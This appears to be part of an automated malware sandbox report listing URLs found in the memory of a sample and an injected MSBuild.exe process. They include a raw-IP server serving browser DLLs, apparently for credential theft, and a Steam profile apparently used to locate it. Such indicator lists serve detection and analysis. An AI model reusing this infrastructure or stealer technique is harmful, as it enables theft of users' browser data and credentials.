                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                        Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: MSBuild.exe, MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2383501124.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.4.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359740327.000000002042D000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212
                        Source: 76561199747278259[1].htm.4.drString found in binary or memory: https://5.75.212.60
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/-
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/A
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/B
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/freebl3.dll
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/freebl3.dllO
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/mozglue.dll
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/msvcp140.dll
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/msvcp140.dllFF
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/nss3.dll
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/nss3.dllQ
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/o
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/softokn3.dll
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/softokn3.dllq
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/sqls.dll
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/vcruntime140.dll
                        Source: DAECFI.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: 76561199747278259[1].htm.4.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, AAFBAK.4.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, AAFBAK.4.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                        Source: DAECFI.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: DAECFI.4.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: DAECFI.4.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=eZOyL2UG5OX8&a
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=e0OV
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&l=e
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                        Source: 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, AAFBAK.4.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, AAFBAK.4.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: DAECFI.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: DAECFI.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: DAECFI.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://help.steampowered.com/en/
                        Source: AAFBAK.4.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: https://mozilla.org0/
                        Source: 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/
                        Source: MSBuild.exe, 00000004.00000002.2346186542.0000000001688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/discussions/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                        Source: 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199747278259
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/market/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                        Source: file.exe, 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000004.00000002.2346186542.00000000016C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/badges
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/inventory/
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997472782592
                        Source: file.exe, 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/workshop/
                        Source: 76561199747278259[1].htm.4.drString found in binary or memory: https://store.steampowered.com/
                        Source: 76561199747278259[1].htm.4.drString found in binary or memory: https://store.steampowered.com/about/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://store.steampowered.com/explore/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://store.steampowered.com/legal/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://store.steampowered.com/mobile
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://store.steampowered.com/news/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://store.steampowered.com/points/shop/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privac
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://store.steampowered.com/stats/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                        Source: CBGCAF.4.drString found in binary or memory: https://support.mozilla.org
                        Source: CBGCAF.4.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: CBGCAF.4.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                        Source: MSBuild.exe, 00000004.00000002.2351862083.0000000019EBC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmp, CBKJJE.4.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                        Source: CBKJJE.4.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                        Source: MSBuild.exe, 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                        Source: MSBuild.exe, 00000004.00000002.2351862083.0000000019EBC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmp, CBKJJE.4.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                        Source: CBKJJE.4.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
